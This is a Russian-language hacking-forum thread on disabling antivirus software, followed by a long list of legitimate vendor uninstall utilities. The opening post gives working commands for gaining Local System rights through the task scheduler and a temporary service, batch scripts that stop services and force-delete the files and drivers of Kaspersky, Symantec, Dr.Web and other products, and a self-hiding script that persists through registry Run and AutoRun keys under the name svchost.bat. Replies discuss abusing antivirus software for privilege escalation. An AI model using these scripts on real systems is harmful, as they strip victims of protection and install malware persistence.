Антивирусы в нокаут

[jaguar]

Антивирус обычно работает как служба, завершать его следует net stop или sc stop.​

Остановка службы SC STOP OC. Описание команды SC STOPКоманда SC STOP посылает службе операционной системы Windows запрос STOP. Для запуска остановленной службы служит команда SC START. Синтаксис и параметры команды SC STOP
sc [имя_сервера] stop имя_службы имя_сервера - Задает имя удаленного сервера, на котором находится служба. В имени следует использовать формат UNC ("\\myserver"). Чтобы запустить SC локально, этот параметр следует пропустить.Имя_службы - Указывает имя службы, возвращенное операцией getkeyname. /? - Отображает справку в командной строке.

Примеры команды SC STOP sc stop spooler - остановка службы очереди печати. Вариант действий будет самым простым — попытка удаления жизненно важных файлов антивируса
На Windows-системах, работая под администратором (а это, наверное, 80% всех систем) получить права Local System достаточно просто. В голову сразу приходит два способа, хорошо описанные в сети.

Способ 1. Использование планировщика.
По умолчанию, на всех Windows-системах работает служба планировщика задач. Эта служба запускает задачи с искомыми правами Local System. Тогда очень просто добавить задание как-то:
at 11:05 c:\killer.bat
и kill.bat запустится с правами Local System.

Преимущества очевидны: всё просто и ясно. Недостаток: пользователь может заметить странную новую задачу в планировщике, да и просто в целях безопасности отключить эту службу.

Способ 1. Создание службы.
Суть метода заключается в создании службы, её запуске и удалении. При этом всё реализуется в три строчки:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem

При этом мало того, что killer.bat запустится с приоритетом IDLE, он ещё и будет запущен от имени Local System.
Метод незаметен, никак не проявляет себя.

На момент публикования статьи KIS 2010 оба метода пропускал на уровне хипса, даже не запрашивая никаких разрешений.

Ну а теперь перейдём к самому killer.bat (в нашем случае он расположен в корне на диске С, но понятно, что закинуть его можно куда угодно).

Суть этого файла проста: удаляем всё, что принадлежит антивирусу. Так, для Касперского 2010 это будет:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"
shutdown -r -f -c "Bye-Bye!!!"

Для Symantec что-то типа (кто знает точнее — поправьте, сам-то я на Касперском):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye!!!"

Для Доктора Веба:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"

Ну и так далее. В первой строчке идёт останов службы восстановления Windows — так, на всякий случай

Понятно, что аналогичный скрипт можно прописать для всех антивирусов — суть изменять пути к жизненно важным файлам.

@echo off

attrib *.bat +h +s

cd %programfiles%\Kaspersky Lab\

del *.* /q /s

cd %programfiles%\DrWeb\

del *.* /q /s

cd %programfiles%\Alwil Software\

del *.* /q /s

cd %programfiles%\ESET\

del *.* /q /s

copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul

reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\system32\batinit.bat" /f >nul

copy ""%0"" "%SystemRoot%\system32\svchost.bat" >nul

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchost" /t REG_SZ /d "%SystemRoot%\system32\svchost.bat" /f >nul

attrib *.bat +h +r +s

в блокноте сохраните с расширением .bat

Итак, чтобы отключить любой антивирус заходим в панель управления , после этого, ищите опцию «администрирование» и нажмите на нее. Кто не может найти, посмотрите с правой стороны вверху: там написано «просмотр», выберите «большие значки»

Ссылка скрыта от гостей

Выберите обычный запуск. Дальше по очереди откройте опции (нажав на них) «службы» и «автозагрузка» и везде где вам встретиться название вашего «защитника» снимайте галочки.
Надеюсь, администрирование нашли. После нажатия на него нажмите «конфигурация системы». Вам откроется еще одно окно, где и будет происходить отключение антивируса. Вам будет предложена перезагрузка, после чего он работать уже не будет.

Удаление программ и антивирусов​

Приложения для полного ручного и автоматического удаления антивирусов, программ, нежелательных плагинов и дополнений с вашего компьютера

Ссылка скрыта от гостей

11.2.0.9040

Dr.Web Removal Tool - официальная утилита для полного удаления антивирусных продуктов Dr.Web версий 4.33 по 11.0, Dr.Web Katana. Также позволяет очистить компьютер от некорректно удаленного антивируса

Ссылка скрыта от гостей

4.4.0.58

Norton Removal Tool и Norton Remove and Reinstall tool - утилиты для полного удаления с компьютера антивирусных программ и продуктов безопасности Norton, включая последние версии антивирусных решений Norton Security и Norton Security with Backup

Ссылка скрыта от гостей

3.1.0.1031

Malwarebytes Clean Uninstall Tool - утилита для удаления Malwarebytes Anti-Exploit, Malwarebytes Anti-Malware и Malwarebytes v3.x, позволяющая полностью удалить все следы антивирусной программы с компьютера, включая настройки и данные лицензии

Ссылка скрыта от гостей

6.15

Soft Organizer (бывшая Full Uninstall) - утилита для полного удаления ненужных программ из системы за счет отслеживания всех изменений, которые происходят во время установки. Приложение доступно бесплатно для пользователей Comss.ru

Ссылка скрыта от гостей

1.36

Утилита для удаления Microsoft Office 2003, 2007, 2010 и 2016. Полезный инструмент для полной деинсталляции пакета программ с вашего компьютера, когда другие способы не помогли

Ссылка скрыта от гостей

2017.09

AV Uninstall Tools Pack - официальные утилиты для удаления антивирусов и сброса их паролей. Включает инструкции как полностью удалить антивирус с компьютера: все файлы, драйвера, службы и записи реестра в системе

Ссылка скрыта от гостей

1.0.370

Revo Uninstaller Mobile - инструмент для удаления мобильных приложений на вашем Android устройстве. Позволяет оптимизировать свободное пространство, улучшить быстродействие и снизить разряд батареи

Ссылка скрыта от гостей

7.0.2.49

IObit Uninstaller Free - удобная бесплатная утилита для быстрого и полного удаления нежелательных программ, папок, панелей инструментов и плагинов браузеров. Не оставляет следов, используя "Мощное сканирование" и "Принудительное удаление"

Ссылка скрыта от гостей

2.0.1.110 + portable

Wise Program Uninstaller деинсталлирует программы с компьютера, удаляет остатки и принудительно ликвидирует приложения, которые не могут быть удалены другими способами

Ссылка скрыта от гостей

17.6.3625.0

Avast Clear (утилита удаления Avast) - инструмент для ручного полного удаления антивирусных программ Avast в безопасном режиме

Ссылка скрыта от гостей

1.0.5.1

Утилита предназначена для полного удаления антивируса F-PROT с компьютера, если удаление невозможно выполнить стандартным способом, или удаление выполнено не полностью.

Ссылка скрыта от гостей

1.0.0.43

Утилита K7 Security Product Removal Tool удаляет с компьютера все остатки антивирусных продуктов K7, которые не были удалены стандартными средствами Windows.

Ссылка скрыта от гостей

6.2.1.2

Утилита удаления позволяет полностью удалить антивирус Bitdefender с вашего компьютера.

Ссылка скрыта от гостей

2.0.2.4

Утилита Avira Registry Cleaner очищает реестр Windows от записей антивирусных продуктов Avira, которые могут остаться после удаления антивируса.

Ссылка скрыта от гостей

[2016-08-02]

Для полного удаления антивирусного сканера Cezurity, используйте утилиту удаления Cezurity Antivirus Remover. Эта утилита очищает систему от всех следов Cezurity из системы.

Ссылка скрыта от гостей

2.00.33

Panda Uninstaller - эта официальная утилита для полного удаления антивирусных продуктов Panda с компьютера.

Ссылка скрыта от гостей

3.0 build 2780

F-Secure Uninstallation Tool - официальная утилита для полного удаления продуктов F-Secure с компьютера. Утилита удаляет все следы антивируса из системы.

Ссылка скрыта от гостей

1.5.7.0

AMD Clean Uninstall Utility - утилита для полного удаления видео и аудио драйверов AMD Catalyst вместе со всеми компонентами, ключами реестра и остаточными файлами

Ссылка скрыта от гостей

(2018) 1.0.1266.0

Утилита для удаления продуктов «Лаборатории Касперского». С помощью нее вы можете удалить последние версии антивирусов: Антивирус Касперского, Kaspersky Internet Security, Kaspersky Free и другие версии антивирусных программ

Ссылка скрыта от гостей

1.2.4.0

ESET AV Remover - утилита для удаления антивирусных программ и приложений безопасности, ранее установленных в вашей системе, перед установкой нового антивируса для Windows

Ссылка скрыта от гостей

Ссылка скрыта от гостей

1.4.4.117

Geek Uninstaller - портативный и простой в использовании бесплатный деинсталлятор с функцией "принудительное удаление" для быстрого и тщательного удаления ненужных программ с вашего компьютера

Ссылка скрыта от гостей

Ссылка скрыта от гостей

3.5.3 + Portable

Uninstall Tool - простая и удобная утилита для полного удаления программ и системных компонентов с вашего компьютера, используя функции Монитор установки и Мастер Удаления

Ссылка скрыта от гостей

8.0.5.0

ESET Uninstaller - официальный инструмент, для полного удаления из системы антивирусных продуктов ESET и их остатков.

Ссылка скрыта от гостей

6.00.14

Ashampoo UnInstaller - передовое решение для эффективного удаления следов ненужных более программ, очистки остатков и поддержания оптимальной производительности системы

Ссылка скрыта от гостей

3.1.9 Pro / 2.0.3 Free

Revo Uninstaller - более быстрая и мощная альтернатива системному апплету "Удаление программ". Продукт включает расширенные функции для деинсталляции программ и очистки их следов, решает проблемы установки и обновления ПО

Ссылка скрыта от гостей

1.0.1.5

AVG Remover - утилита для полного удаления всех версий антивирусных программ AVG Internet Security, AVG AntiVirus и бесплатного антивируса AVG AntiVirus Free

Ссылка скрыта от гостей

12.4.49.0 Beta

Используя Avast Software Cleanup, проверяйте рейтинг установленных программ и удаляйте приложения с плохой репутацией для того, чтобы избежать потенциальные риски безопасности

Ссылка скрыта от гостей

1.0.4.36591

Should I Remove It? помогает удалять бесполезное рекламное ПО и нежелательные программы, в частности шпионское ПО, панели инструментов, комплектные ПНП, а также различные виды вредоносных программ

Ссылка скрыта от гостей

3.1.34.1

AppRemover - эффективный инструмент для удаления с вашего компьютера приложений безопасности, таких как антивирусы и антишпионы

Ссылка скрыта от гостей

2.35

Antivirus Remover - приложение для удаления антивирусных программ с помощью официальных утилит. Позволяет удалить антивирус, установленный на вашем компьютере, и очистить все следы из системного реестра и временные файлы

Ссылка скрыта от гостей

1.3.30878.17258

SlimComputer - бесплатная утилита, работающая на основе сообщества пользователей, которая поможет обнаружить и удалить на вашем компьютере нежелательные и рекламные программы, объекты автозагрузки, панели инструментов, отключить ненужные службы

Ссылка скрыта от гостей

2012 12.0.0.1

Утилита TrustPort Removal 2012 удаляет все следы установки антивирусов TrustPort на вашем компьютере

Ссылка скрыта от гостей

7.1.3479.11508​

ВЫВОДЫ

К сожалению, приходится констатировать факт, что некоторые из существующих антивирусных решений имеют ряд уязвимостей, которые могут быть использованы для повреждения защиты и фактически удалению антивируса с компьютера.​

 

[<~DarkNode~>]

ФАКТ: Моими коллегами неоднократно было использовано АВ программу для повышение привилегий в системе.
Обьяснить это можно тем , что некоторые АВ программы для проверки файла инициализируют его запуск, а так как АнтиВирус работает как служба, некоторые от имени системы , это логически приводит к повышению привилегий.

 

[IioS]

использовано АВ программу для повышение привилегий в системе

А во время инициализации АВ не палит что это нагрузка, или прост зловред?

 

[ghostphisher]

На хабре лежит очень похожая статья за 10 год

Ссылка скрыта от гостей

Хорошо конечно, что тему подняли. Поддержу ~~DarkNode~~, при верном подходе АВ станет приветливым другом во время атаки, и вот на эту тему статей бы больше. В ближайшее время мы планируем еще конкурс ( примерно декабрь ) статьи подобного направления будут в приоритете.

 

[<~DarkNode~>]

А во время инициализации АВ не палит что это нагрузка, или прост зловред?

Если ее обойти то нет)

 

[Vertigo]

Бро,статья супер на самом деле,достойна серьёзных дискуссий.Метки,Бро,нормальные делай пожалуйста,чтобы были не как загадки Цикад и цифровой код,а согласно темам.И всё у тебя будет отлично,Парень.Благодарю за материал,очень пригодится и ,не буду лукавить,многое взял на изучение.